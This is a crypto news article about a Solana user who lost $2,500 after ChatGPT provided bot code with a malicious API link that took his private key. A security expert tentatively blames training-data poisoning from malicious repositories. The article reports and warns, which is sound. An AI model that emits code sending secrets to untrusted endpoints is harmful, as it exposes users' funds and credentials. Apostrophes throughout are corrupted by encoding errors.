Solana Exploit Reveals Risks of AI-Generated Code

A Solana user lost $2,500 after ChatGPT provided a malicious API link.

Glass skull emitting smoke and code in a desert.
Created by Gabor Kovacs from DailyCoin
  • A user lost $2,500 after using AI to code on Solana. 
  • ChatGPT provided a malicious API link.
  • The incident shows the risks of AI-generated code. 

Artificial intelligence (AI) is rapidly changing how people perform work, including programming. The AIโ€™s ability to generate code is seen as a way to streamline work for developers, and even enable non-developers to create applications. However, AI also comes with risks, including in programming.

Sponsored

A recent incident revealed the risks of using AI-generated code in crypto. In the first-ever incident of its type in crypto, one user reported losing $2,500 after ChatGPT served malicious code for his Solana application. 

AI-Generated Code Leads to Solana Wallet Exploit

The first incident of its type revealed the dangers of AI-generated coding in crypto. On November 21, a user reported losing $2,500 after working on a bot for Solanaโ€™s Pump.fun platform. The issue arose when ChatGPT gave the user malicious code. 

The user asked ChatGPT for help with the code. However, the AI model provided a malicious API link, which redirected the user to a scam website. After the user inputted his private key to the API, the attackers quickly drained the wallet of its assets, including SOL and USDC.

Following the incident, the user reported the malicious repository and highlighted the attackerโ€™s wallet. The user also reported the malicious code repository, hoping it would be removed soon.ย 

AI Poisoning Likely Cultpit

Following the incident, security experts analyzed what happened. Yu Xian, the founder of the security firm Slowmist, suggested that the likely explanation was the user playing around with AI-generated code without verifying it.ย 

He suggested that the likely explanation for the incident was AI poisoning. This happens when AIโ€™s training data contains code from compromised or malicious repositories. The practice of deliberately trying to insert malicious code into AI training data is known as AI poisoning, a growing risk for AI users. 

The incident reveals the dangers of trusting AI-generated code without independently verifying it. Despite AIโ€™s potential to make coding more accessible, developers should ensure their safety when using it.ย 

On the Flipside

  • AI poisoning could undermine the trust in using programs like ChatGPT, especially for coding. 
  • LLMs can provide inaccurate information even in tasks other than coding, which introduces risks for users. 

Why This Matters

The exploit reveals the risks of using AI-generated code in crypto, especially for inexperienced users. Users should verify the critical parts of the generated code before interacting with it. 

Read more about crypto hacks: 
12 Biggest Hacks in Crypto Exchange History

Read more about Solanaโ€™s latest performance: 
Solanaโ€™s All-Time High Gives Whales Millions in Profits

This article is for information purposes only and should not be considered trading or investment advice. Nothing herein shall be construed as financial, legal, or tax advice. Trading forex, cryptocurrencies, and CFDs pose a considerable risk of loss.

Author
David Marsanic

David Marsanic is DailyCoinโ€™s journalist, focusing on Solana and crypto exchanges. David currently doesnโ€™t hold any crypto.

Read more